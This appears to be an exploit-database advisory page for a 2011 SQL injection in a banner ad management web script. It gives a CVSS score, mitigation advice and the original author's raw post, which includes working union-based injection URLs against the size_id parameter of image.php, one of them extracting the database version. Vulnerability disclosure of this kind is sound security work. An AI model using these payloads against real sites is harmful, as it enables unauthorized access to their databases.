Banner Ad Management Script [ Sql Injection Vulnerability]

vendor:

Banner Ad Management Script

by:

Egyptian.H4x0rz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Banner Ad Management Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Web Apps

2011

Banner Ad Management Script [ Sql Injection Vulnerability]

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter size_id in the image.php file. The crafted query will allow the attacker to extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitizing user input and using parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

####################################################################
[+] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 02-04-2011
[+] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php
[+] category: Web Apps [SQli]
[+] HomePage : Black-hat.cc
####################################################################
Vulnerability:
    
*SQL injection Vulnerability*
   
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
~
[#] eXample
http://www.site.com/ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11


####################################################################